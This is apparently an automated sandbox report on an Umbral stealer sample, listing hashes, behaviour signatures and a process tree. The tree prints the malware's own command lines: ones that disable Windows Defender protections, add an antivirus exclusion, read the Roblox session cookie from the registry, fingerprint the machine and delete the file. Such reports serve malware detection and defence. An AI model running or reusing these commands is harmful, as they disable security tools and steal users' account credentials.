Analysis

  • max time kernel
    16s
  • max time network
    17s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    13-12-2024 07:06

General

  • Target

    230f75b72d5021a921637929a63cfd79.exe

  • Size

    231KB

  • MD5

    230f75b72d5021a921637929a63cfd79

  • SHA1

    71af2ee3489d49914f7c7fa4e16e8398e97e0fc8

  • SHA256

    a5011c165dbd8459396a3b4f901c7faa668e95e395fb12d7c967c34c0d974355

  • SHA512

    3dc11aac2231daf30871d30f43eba3eadf14f3b003dd1f81466cde021b0b59d38c5e9a320e6705b4f5a0eeebf93f9ee5459173e20de2ab3ae3f3e9988819f001

  • SSDEEP

    6144:xloZMUrIkd8g+EtXHkv/iD4b3gulGELnsyd42X3Wc8b8e1mDQi:DoZrL+EP8b3gulGELnsyd42X3WxYJ

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Umbral family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 1 IoCs
  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\230f75b72d5021a921637929a63cfd79.exe
    "C:\Users\Admin\AppData\Local\Temp\230f75b72d5021a921637929a63cfd79.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2604
    • C:\Windows\system32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\230f75b72d5021a921637929a63cfd79.exe"
      2⤵
      • Views/modifies file attributes
      PID:2856
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\230f75b72d5021a921637929a63cfd79.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2888
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2884
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2732
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2960
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:980
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2096
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
        PID:2384
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:1248
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic" path win32_VideoController get name
        2⤵
        • Detects videocard installed
        PID:1052
      • C:\Windows\system32\cmd.exe
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\230f75b72d5021a921637929a63cfd79.exe" && pause
        2⤵
        • Deletes itself
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:2600
        • C:\Windows\system32\PING.EXE
          ping localhost
          3⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2232

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

      Filesize

      7KB

      MD5

      2a17645a7e854eff11a4b1df72363e07

      SHA1

      4d13502356d6a7fcce33e59a6ac479a6bca692ab

      SHA256

      072cfefbc036c201920eb15392f2fb0c45de94e655e55bd1fe549d0674dbfa26

      SHA512

      049024fd4ed76aa203a00dd33027c3bdb1d4b670106376d7cbccd463bd22343e9748d04575a8e1467c86a2490cf5acab2e3f90e541c64d510feba08c49bb1ea9

    • memory/2604-1-0x0000000001360000-0x00000000013A0000-memory.dmp

      Filesize

      256KB

    • memory/2604-2-0x000007FEF5790000-0x000007FEF617C000-memory.dmp

      Filesize

      9.9MB

    • memory/2604-50-0x000007FEF5790000-0x000007FEF617C000-memory.dmp

      Filesize

      9.9MB

    • memory/2604-0-0x000007FEF5793000-0x000007FEF5794000-memory.dmp

      Filesize

      4KB

    • memory/2604-40-0x000007FEF5793000-0x000007FEF5794000-memory.dmp

      Filesize

      4KB

    • memory/2604-41-0x000007FEF5790000-0x000007FEF617C000-memory.dmp

      Filesize

      9.9MB

    • memory/2884-22-0x00000000028E0000-0x00000000028E8000-memory.dmp

      Filesize

      32KB

    • memory/2884-21-0x000000001B6B0000-0x000000001B992000-memory.dmp

      Filesize

      2.9MB

    • memory/2888-10-0x0000000001D80000-0x0000000001D88000-memory.dmp

      Filesize

      32KB

    • memory/2888-14-0x000007FEED250000-0x000007FEEDBED000-memory.dmp

      Filesize

      9.6MB

    • memory/2888-15-0x000007FEED250000-0x000007FEEDBED000-memory.dmp

      Filesize

      9.6MB

    • memory/2888-13-0x000007FEED250000-0x000007FEEDBED000-memory.dmp

      Filesize

      9.6MB

    • memory/2888-12-0x000007FEED250000-0x000007FEEDBED000-memory.dmp

      Filesize

      9.6MB

    • memory/2888-11-0x000007FEED250000-0x000007FEEDBED000-memory.dmp

      Filesize

      9.6MB

    • memory/2888-8-0x000000001B610000-0x000000001B8F2000-memory.dmp

      Filesize

      2.9MB

    • memory/2888-9-0x000007FEED250000-0x000007FEEDBED000-memory.dmp

      Filesize

      9.6MB

    • memory/2888-7-0x000007FEED50E000-0x000007FEED50F000-memory.dmp

      Filesize

      4KB